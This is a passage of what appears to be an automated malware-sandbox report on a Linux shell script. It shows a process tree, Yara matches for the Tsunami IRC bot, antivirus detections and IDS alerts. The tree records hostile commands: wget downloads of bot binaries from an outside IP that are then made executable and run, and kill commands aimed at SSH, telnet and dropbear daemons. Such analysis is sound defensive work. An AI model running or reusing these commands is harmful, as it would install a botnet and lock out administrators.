            • systemctl (PID: 8263, Parent: 7380, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7380, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop telnetd.service
        • irq1 New Fork (PID: 7381, Parent: 6305)
        • sh (PID: 7381, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "service sshd stop > /dev/null 2>&1 &"
          • sh New Fork (PID: 7385, Parent: 7381)
          • service (PID: 7385, Parent: 7381, MD5: 81c4fe604ec67916db7b223725e5a9c6) Arguments: /bin/sh /usr/sbin/service sshd stop
            • service New Fork (PID: 7389, Parent: 7385)
            • basename (PID: 7389, Parent: 7385, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7420, Parent: 7385)
            • basename (PID: 7420, Parent: 7385, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/sbin/service
            • service New Fork (PID: 7465, Parent: 7385)
            • systemctl (PID: 7465, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl --quiet is-active multi-user.target
            • service New Fork (PID: 7559, Parent: 7385)
              • service New Fork (PID: 7562, Parent: 7559)
              • systemctl (PID: 7562, Parent: 7559, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl list-unit-files --full --type=socket
              • service New Fork (PID: 7563, Parent: 7559)
              • sed (PID: 7563, Parent: 7559, MD5: c1a00c583ba08e728b10f3f46f5776d6) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • service New Fork (PID: 7614, Parent: 7385)
            • systemctl (PID: 7614, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show acpid.socket
            • service New Fork (PID: 7633, Parent: 7385)
            • systemctl (PID: 7633, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show apport-forward.socket
            • service New Fork (PID: 7668, Parent: 7385)
            • systemctl (PID: 7668, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show avahi-daemon.socket
            • service New Fork (PID: 7695, Parent: 7385)
            • systemctl (PID: 7695, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show cups.socket
            • service New Fork (PID: 7723, Parent: 7385)
            • systemctl (PID: 7723, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dbus.socket
            • service New Fork (PID: 7757, Parent: 7385)
            • systemctl (PID: 7757, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show dm-event.socket
            • service New Fork (PID: 7777, Parent: 7385)
            • systemctl (PID: 7777, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmetad.socket
            • service New Fork (PID: 7812, Parent: 7385)
            • systemctl (PID: 7812, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lvm2-lvmpolld.socket
            • service New Fork (PID: 7839, Parent: 7385)
            • systemctl (PID: 7839, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show lxd.socket
            • service New Fork (PID: 7847, Parent: 7385)
            • systemctl (PID: 7847, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show saned.socket
            • service New Fork (PID: 7893, Parent: 7385)
            • systemctl (PID: 7893, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show snapd.socket
            • service New Fork (PID: 7897, Parent: 7385)
            • systemctl (PID: 7897, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show ssh.socket
            • service New Fork (PID: 7939, Parent: 7385)
            • systemctl (PID: 7939, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show syslog.socket
            • service New Fork (PID: 7974, Parent: 7385)
            • systemctl (PID: 7974, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-bus-proxyd.socket
            • service New Fork (PID: 7983, Parent: 7385)
            • systemctl (PID: 7983, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-fsckd.socket
            • service New Fork (PID: 8012, Parent: 7385)
            • systemctl (PID: 8012, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-initctl.socket
            • service New Fork (PID: 8042, Parent: 7385)
            • systemctl (PID: 8042, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-audit.socket
            • service New Fork (PID: 8072, Parent: 7385)
            • systemctl (PID: 8072, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald-dev-log.socket
            • service New Fork (PID: 8093, Parent: 7385)
            • systemctl (PID: 8093, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-journald.socket
            • service New Fork (PID: 8120, Parent: 7385)
            • systemctl (PID: 8120, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-networkd.socket
            • service New Fork (PID: 8162, Parent: 7385)
            • systemctl (PID: 8162, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-rfkill.socket
            • service New Fork (PID: 8174, Parent: 7385)
            • systemctl (PID: 8174, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-control.socket
            • service New Fork (PID: 8198, Parent: 7385)
            • systemctl (PID: 8198, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show systemd-udevd-kernel.socket
            • service New Fork (PID: 8246, Parent: 7385)
            • systemctl (PID: 8246, Parent: 7385, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl -p Triggers show uuidd.socket
          • systemctl (PID: 7385, Parent: 3310, MD5: b08096235b8c90203e17721264b5ce40) Arguments: systemctl stop sshd.service
        • irq1 New Fork (PID: 7391, Parent: 6305)
        • sh (PID: 7391, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 telnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7432, Parent: 7391)
          • killall (PID: 7432, Parent: 7391, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd
        • irq1 New Fork (PID: 7435, Parent: 6305)
        • sh (PID: 7435, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 utelnetd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7491, Parent: 7435)
          • killall (PID: 7491, Parent: 7435, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 utelnetd
        • irq1 New Fork (PID: 7492, Parent: 6305)
        • sh (PID: 7492, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 dropbear > /dev/null 2>&1 &"
          • sh New Fork (PID: 7510, Parent: 7492)
          • killall (PID: 7510, Parent: 7492, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 dropbear
        • irq1 New Fork (PID: 7511, Parent: 6305)
        • sh (PID: 7511, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 sshd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7526, Parent: 7511)
          • killall (PID: 7526, Parent: 3310, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 sshd
        • irq1 New Fork (PID: 7527, Parent: 6305)
        • sh (PID: 7527, Parent: 6305, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "killall -9 lighttpd > /dev/null 2>&1 &"
          • sh New Fork (PID: 7546, Parent: 7527)
          • killall (PID: 7546, Parent: 7527, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 lighttpd
        • irq1 New Fork (PID: 8407, Parent: 6305)
          • irq1 New Fork (PID: 8433, Parent: 8407)
          • sh (PID: 8433, Parent: 8407, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;( kill -9 `cat /var/run/dropbear.pid` `cat /var/run/sshd.pid` ; killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear ; rm -rf /var/run/tt* /tmp/tt* )>/dev/null 2>&1 & "
            • sh New Fork (PID: 8435, Parent: 8433)
              • sh New Fork (PID: 8436, Parent: 8435)
              • cat (PID: 8436, Parent: 8435, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/dropbear.pid
              • sh New Fork (PID: 8438, Parent: 8435)
              • cat (PID: 8438, Parent: 8435, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /var/run/sshd.pid
              • sh New Fork (PID: 8462, Parent: 8435)
              • killall (PID: 8462, Parent: 8435, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 tty0 tty1 tty4 tty5 tty6 sshd dropbear
            • rm (PID: 8435, Parent: 3310, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/tt* /tmp/tt*
        • irq1 New Fork (PID: 9006, Parent: 6305)
          • irq1 New Fork (PID: 9008, Parent: 9006)
          • irq1 New Fork (PID: 9010, Parent: 9006)
          • irq1 New Fork (PID: 9011, Parent: 9006)
          • irq1 New Fork (PID: 9012, Parent: 9006)
          • irq1 New Fork (PID: 9016, Parent: 9006)
          • irq1 New Fork (PID: 9017, Parent: 9006)
          • irq1 New Fork (PID: 9020, Parent: 9006)
          • irq1 New Fork (PID: 9021, Parent: 9006)
          • irq1 New Fork (PID: 9022, Parent: 9006)
          • irq1 New Fork (PID: 9026, Parent: 9006)
          • irq1 New Fork (PID: 9027, Parent: 9006)
          • irq1 New Fork (PID: 9028, Parent: 9006)
          • irq1 New Fork (PID: 9029, Parent: 9006)
          • irq1 New Fork (PID: 9030, Parent: 9006)
          • irq1 New Fork (PID: 9036, Parent: 9006)
          • irq1 New Fork (PID: 9037, Parent: 9006)
          • irq1 New Fork (PID: 9040, Parent: 9006)
          • irq1 New Fork (PID: 9042, Parent: 9006)
          • irq1 New Fork (PID: 9043, Parent: 9006)
          • irq1 New Fork (PID: 9046, Parent: 9006)
          • irq1 New Fork (PID: 9047, Parent: 9006)
          • irq1 New Fork (PID: 9050, Parent: 9006)
          • irq1 New Fork (PID: 9052, Parent: 9006)
          • irq1 New Fork (PID: 9053, Parent: 9006)
          • irq1 New Fork (PID: 9056, Parent: 9006)
          • irq1 New Fork (PID: 9057, Parent: 9006)
          • irq1 New Fork (PID: 9060, Parent: 9006)
          • irq1 New Fork (PID: 9061, Parent: 9006)
          • irq1 New Fork (PID: 9062, Parent: 9006)
          • irq1 New Fork (PID: 9067, Parent: 9006)
          • irq1 New Fork (PID: 9068, Parent: 9006)
          • irq1 New Fork (PID: 9071, Parent: 9006)
          • irq1 New Fork (PID: 9072, Parent: 9006)
          • irq1 New Fork (PID: 9075, Parent: 9006)
          • irq1 New Fork (PID: 9076, Parent: 9006)
          • irq1 New Fork (PID: 9077, Parent: 9006)
          • irq1 New Fork (PID: 9081, Parent: 9006)
          • irq1 New Fork (PID: 9083, Parent: 9006)
          • irq1 New Fork (PID: 9084, Parent: 9006)
          • irq1 New Fork (PID: 9087, Parent: 9006)
          • irq1 New Fork (PID: 9088, Parent: 9006)
          • irq1 New Fork (PID: 9089, Parent: 9006)
          • irq1 New Fork (PID: 9091, Parent: 9006)
          • irq1 New Fork (PID: 9092, Parent: 9006)
          • irq1 New Fork (PID: 9093, Parent: 9006)
          • irq1 New Fork (PID: 9094, Parent: 9006)
          • irq1 New Fork (PID: 9095, Parent: 9006)
          • irq1 New Fork (PID: 9096, Parent: 9006)
          • irq1 New Fork (PID: 9097, Parent: 9006)
          • irq1 New Fork (PID: 9108, Parent: 9006)
          • irq1 New Fork (PID: 9109, Parent: 9006)
          • irq1 New Fork (PID: 9110, Parent: 9006)
          • irq1 New Fork (PID: 9111, Parent: 9006)
          • irq1 New Fork (PID: 9112, Parent: 9006)
          • irq1 New Fork (PID: 9113, Parent: 9006)
          • irq1 New Fork (PID: 9114, Parent: 9006)
          • irq1 New Fork (PID: 9115, Parent: 9006)
          • irq1 New Fork (PID: 9116, Parent: 9006)
          • irq1 New Fork (PID: 9117, Parent: 9006)
          • irq1 New Fork (PID: 9129, Parent: 9006)
          • irq1 New Fork (PID: 9130, Parent: 9006)
          • irq1 New Fork (PID: 9131, Parent: 9006)
          • irq1 New Fork (PID: 9132, Parent: 9006)
          • irq1 New Fork (PID: 9133, Parent: 9006)
          • irq1 New Fork (PID: 9134, Parent: 9006)
          • irq1 New Fork (PID: 9135, Parent: 9006)
          • irq1 New Fork (PID: 9136, Parent: 9006)
          • irq1 New Fork (PID: 9137, Parent: 9006)
          • irq1 New Fork (PID: 9138, Parent: 9006)
          • irq1 New Fork (PID: 9139, Parent: 9006)
          • irq1 New Fork (PID: 9151, Parent: 9006)
          • irq1 New Fork (PID: 9152, Parent: 9006)
          • irq1 New Fork (PID: 9153, Parent: 9006)
          • irq1 New Fork (PID: 9154, Parent: 9006)
          • irq1 New Fork (PID: 9155, Parent: 9006)
          • irq1 New Fork (PID: 9156, Parent: 9006)
          • irq1 New Fork (PID: 9157, Parent: 9006)
          • irq1 New Fork (PID: 9158, Parent: 9006)
          • irq1 New Fork (PID: 9159, Parent: 9006)
          • irq1 New Fork (PID: 9160, Parent: 9006)
          • irq1 New Fork (PID: 9161, Parent: 9006)
          • irq1 New Fork (PID: 9174, Parent: 9006)
          • irq1 New Fork (PID: 9175, Parent: 9006)
          • irq1 New Fork (PID: 9176, Parent: 9006)
          • irq1 New Fork (PID: 9177, Parent: 9006)
          • irq1 New Fork (PID: 9178, Parent: 9006)
          • irq1 New Fork (PID: 9179, Parent: 9006)
          • irq1 New Fork (PID: 9180, Parent: 9006)
          • irq1 New Fork (PID: 9181, Parent: 9006)
          • irq1 New Fork (PID: 9182, Parent: 9006)
          • irq1 New Fork (PID: 9183, Parent: 9006)
          • irq1 New Fork (PID: 9184, Parent: 9006)
          • irq1 New Fork (PID: 9185, Parent: 9006)
          • irq1 New Fork (PID: 9186, Parent: 9006)
          • irq1 New Fork (PID: 9200, Parent: 9006)
          • irq1 New Fork (PID: 9201, Parent: 9006)
          • irq1 New Fork (PID: 9202, Parent: 9006)
          • irq1 New Fork (PID: 9203, Parent: 9006)
          • irq1 New Fork (PID: 9204, Parent: 9006)
          • irq1 New Fork (PID: 9205, Parent: 9006)
          • irq1 New Fork (PID: 9206, Parent: 9006)
          • irq1 New Fork (PID: 9207, Parent: 9006)
          • irq1 New Fork (PID: 9208, Parent: 9006)
          • irq1 New Fork (PID: 9209, Parent: 9006)
          • irq1 New Fork (PID: 9220, Parent: 9006)
          • irq1 New Fork (PID: 9221, Parent: 9006)
          • irq1 New Fork (PID: 9222, Parent: 9006)
          • irq1 New Fork (PID: 9223, Parent: 9006)
          • irq1 New Fork (PID: 9224, Parent: 9006)
          • irq1 New Fork (PID: 9225, Parent: 9006)
          • irq1 New Fork (PID: 9226, Parent: 9006)
          • irq1 New Fork (PID: 9227, Parent: 9006)
          • irq1 New Fork (PID: 9228, Parent: 9006)
          • irq1 New Fork (PID: 9229, Parent: 9006)
          • irq1 New Fork (PID: 9230, Parent: 9006)
          • irq1 New Fork (PID: 9231, Parent: 9006)
          • irq1 New Fork (PID: 9232, Parent: 9006)
          • irq1 New Fork (PID: 9233, Parent: 9006)
          • irq1 New Fork (PID: 9234, Parent: 9006)
          • irq1 New Fork (PID: 9251, Parent: 9006)
          • irq1 New Fork (PID: 9252, Parent: 9006)
          • irq1 New Fork (PID: 9256, Parent: 9006)
          • irq1 New Fork (PID: 9257, Parent: 9006)
          • irq1 New Fork (PID: 9258, Parent: 9006)
          • irq1 New Fork (PID: 9259, Parent: 9006)
          • irq1 New Fork (PID: 9260, Parent: 9006)
          • irq1 New Fork (PID: 9261, Parent: 9006)
          • irq1 New Fork (PID: 9268, Parent: 9006)
          • irq1 New Fork (PID: 9270, Parent: 9006)
          • irq1 New Fork (PID: 9272, Parent: 9006)
          • irq1 New Fork (PID: 9273, Parent: 9006)
          • irq1 New Fork (PID: 9274, Parent: 9006)
          • irq1 New Fork (PID: 9275, Parent: 9006)
          • irq1 New Fork (PID: 9276, Parent: 9006)
          • irq1 New Fork (PID: 9277, Parent: 9006)
          • irq1 New Fork (PID: 9278, Parent: 9006)
          • irq1 New Fork (PID: 9279, Parent: 9006)
          • irq1 New Fork (PID: 9280, Parent: 9006)
          • irq1 New Fork (PID: 9281, Parent: 9006)
          • irq1 New Fork (PID: 9282, Parent: 9006)
          • irq1 New Fork (PID: 9283, Parent: 9006)
          • irq1 New Fork (PID: 9284, Parent: 9006)
          • irq1 New Fork (PID: 9285, Parent: 9006)
          • irq1 New Fork (PID: 9286, Parent: 9006)
          • irq1 New Fork (PID: 9302, Parent: 9006)
          • irq1 New Fork (PID: 9304, Parent: 9006)
          • irq1 New Fork (PID: 9305, Parent: 9006)
          • irq1 New Fork (PID: 9306, Parent: 9006)
          • irq1 New Fork (PID: 9307, Parent: 9006)
          • irq1 New Fork (PID: 9308, Parent: 9006)
          • irq1 New Fork (PID: 9309, Parent: 9006)
          • irq1 New Fork (PID: 9310, Parent: 9006)
          • irq1 New Fork (PID: 9311, Parent: 9006)
          • irq1 New Fork (PID: 9312, Parent: 9006)
          • irq1 New Fork (PID: 9313, Parent: 9006)
          • irq1 New Fork (PID: 9314, Parent: 9006)
          • irq1 New Fork (PID: 9315, Parent: 9006)
          • irq1 New Fork (PID: 9316, Parent: 9006)
          • irq1 New Fork (PID: 9317, Parent: 9006)
          • irq1 New Fork (PID: 9318, Parent: 9006)
          • irq1 New Fork (PID: 9319, Parent: 9006)
          • irq1 New Fork (PID: 9320, Parent: 9006)
          • irq1 New Fork (PID: 9321, Parent: 9006)
          • irq1 New Fork (PID: 9340, Parent: 9006)
          • irq1 New Fork (PID: 9341, Parent: 9006)
          • irq1 New Fork (PID: 9342, Parent: 9006)
          • irq1 New Fork (PID: 9343, Parent: 9006)
          • irq1 New Fork (PID: 9344, Parent: 9006)
          • irq1 New Fork (PID: 9345, Parent: 9006)
          • irq1 New Fork (PID: 9352, Parent: 9006)
          • irq1 New Fork (PID: 9353, Parent: 9006)
          • irq1 New Fork (PID: 9354, Parent: 9006)
          • irq1 New Fork (PID: 9355, Parent: 9006)
          • irq1 New Fork (PID: 9356, Parent: 9006)
          • irq1 New Fork (PID: 9357, Parent: 9006)
          • irq1 New Fork (PID: 9358, Parent: 9006)
          • irq1 New Fork (PID: 9359, Parent: 9006)
          • irq1 New Fork (PID: 9360, Parent: 9006)
          • irq1 New Fork (PID: 9361, Parent: 9006)
          • irq1 New Fork (PID: 9362, Parent: 9006)
          • irq1 New Fork (PID: 9363, Parent: 9006)
          • irq1 New Fork (PID: 9364, Parent: 9006)
          • irq1 New Fork (PID: 9379, Parent: 9006)
          • irq1 New Fork (PID: 9380, Parent: 9006)
          • irq1 New Fork (PID: 9383, Parent: 9006)
          • irq1 New Fork (PID: 9384, Parent: 9006)
          • irq1 New Fork (PID: 9385, Parent: 9006)
          • irq1 New Fork (PID: 9386, Parent: 9006)
          • irq1 New Fork (PID: 9387, Parent: 9006)
          • irq1 New Fork (PID: 9388, Parent: 9006)
          • irq1 New Fork (PID: 9389, Parent: 9006)
          • irq1 New Fork (PID: 9390, Parent: 9006)
          • irq1 New Fork (PID: 9391, Parent: 9006)
          • irq1 New Fork (PID: 9392, Parent: 9006)
          • irq1 New Fork (PID: 9404, Parent: 9006)
          • irq1 New Fork (PID: 9406, Parent: 9006)
          • irq1 New Fork (PID: 9407, Parent: 9006)
          • irq1 New Fork (PID: 9408, Parent: 9006)
          • irq1 New Fork (PID: 9409, Parent: 9006)
          • irq1 New Fork (PID: 9410, Parent: 9006)
          • irq1 New Fork (PID: 9411, Parent: 9006)
          • irq1 New Fork (PID: 9412, Parent: 9006)
          • irq1 New Fork (PID: 9413, Parent: 9006)
          • irq1 New Fork (PID: 9414, Parent: 9006)
          • irq1 New Fork (PID: 9415, Parent: 9006)
          • irq1 New Fork (PID: 9416, Parent: 9006)
          • irq1 New Fork (PID: 9417, Parent: 9006)
          • irq1 New Fork (PID: 9418, Parent: 9006)
          • irq1 New Fork (PID: 9436, Parent: 9006)
          • irq1 New Fork (PID: 9437, Parent: 9006)
          • irq1 New Fork (PID: 9440, Parent: 9006)
          • irq1 New Fork (PID: 9442, Parent: 9006)
          • irq1 New Fork (PID: 9698, Parent: 9006)
    • sh New Fork (PID: 5979, Parent: 4580)
    • wget (PID: 5979, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/irq2 -O irq2
    • sh New Fork (PID: 6382, Parent: 4580)
    • chmod (PID: 6382, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x irq2
    • sh New Fork (PID: 6385, Parent: 4580)
    • chmod (PID: 6385, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 irq2
    • sh New Fork (PID: 6392, Parent: 4580)
    • irq2 (PID: 6392, Parent: 4580, MD5: unknown) Arguments: /usr/bin/qemu-mipsel ./irq2
    • sh New Fork (PID: 6393, Parent: 4580)
    • wget (PID: 6393, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O /var/tmp/pty
    • sh New Fork (PID: 6699, Parent: 4580)
    • chmod (PID: 6699, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/tmp/pty
    • sh New Fork (PID: 6705, Parent: 4580)
    • chmod (PID: 6705, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/tmp/pty
    • sh New Fork (PID: 6712, Parent: 4580)
    • pty (PID: 6712, Parent: 4580, MD5: 05e1c4a7333bfbd41d109ffc2f70a52a) Arguments: /var/tmp/pty
      • pty New Fork (PID: 6729, Parent: 6712)
    • sh New Fork (PID: 6713, Parent: 4580)
    • wget (PID: 6713, Parent: 4580, MD5: 458ce58ac4b1aac3eafc287fa46bf92d) Arguments: wget http://71.127.148.69/.x/pty -O /var/run/pty
    • sh New Fork (PID: 7019, Parent: 4580)
    • chmod (PID: 7019, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod +x /var/run/pty
    • sh New Fork (PID: 7024, Parent: 4580)
    • chmod (PID: 7024, Parent: 4580, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod 700 /var/run/pty
    • sh New Fork (PID: 7031, Parent: 4580)
    • sh New Fork (PID: 7032, Parent: 4580)
    • rm (PID: 7032, Parent: 4580, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf /var/run/1sh
  • systemd New Fork (PID: 6376, Parent: 1)
  • sshd (PID: 6376, Parent: 1, MD5: 661b2a2da3b6c7d7ef41d0b9da1caa3b) Arguments: /usr/sbin/sshd -D
  • upstart New Fork (PID: 8683, Parent: 3310)
  • sh (PID: 8683, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8686, Parent: 8683)
    • date (PID: 8686, Parent: 8683, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8705, Parent: 8683)
    • apport-checkreports (PID: 8705, Parent: 8683, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 8937, Parent: 3310)
  • sh (PID: 8937, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8938, Parent: 8937)
    • date (PID: 8938, Parent: 8937, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8942, Parent: 8937)
    • apport-gtk (PID: 8942, Parent: 8937, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 8964, Parent: 3310)
  • sh (PID: 8964, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 8965, Parent: 8964)
    • date (PID: 8965, Parent: 8964, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 8966, Parent: 8964)
    • apport-gtk (PID: 8966, Parent: 8964, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
6712.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
  • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
6729.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
  • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
5334.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
  • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
8335.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
  • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
4829.1.0000000008048000.000000000805c000.r-x.sdmpLinuxTsunamiunknownunknown
  • 0xdda4:$c: NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 1.shVirustotal: Detection: 16%Perma Link
Source: 1.shReversingLabs: Detection: 24%
Machine Learning detection for dropped fileShow sources
Source: /var/tmp/ptyJoe Sandbox ML: detected
Source: /run/ptyJoe Sandbox ML: detected
Source: /tmp/ptyJoe Sandbox ML: detected

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2000345 ET TROJAN IRC Nick change on non-standard port 192.168.2.20:40072 -> 103.3.46.2:8080
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 162.246.127.152: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.11.33.18: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 216.52.184.14: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.141.48.25: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 63.245.20.34: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.206.52.159: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 4.53.200.74: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.124.123.78: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.202.3.178: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 50.227.112.182: -> 192.168.2.20:
Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 162.218.243.63: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 38.104.74.98: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 209.212.63.146: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.115.51.194: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 162.127.1.76: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 190.8.46.146: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.15.124.222: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.194.199.213: -> 192.168.2.20:
Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 201.238.238.219: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 65.47.204.166: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 162.155.30.50: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 63.245.90.157: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 190.5.177.1: -> 192.168.2.20:
Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 62.115.181.31: -> 192.168.2.20:
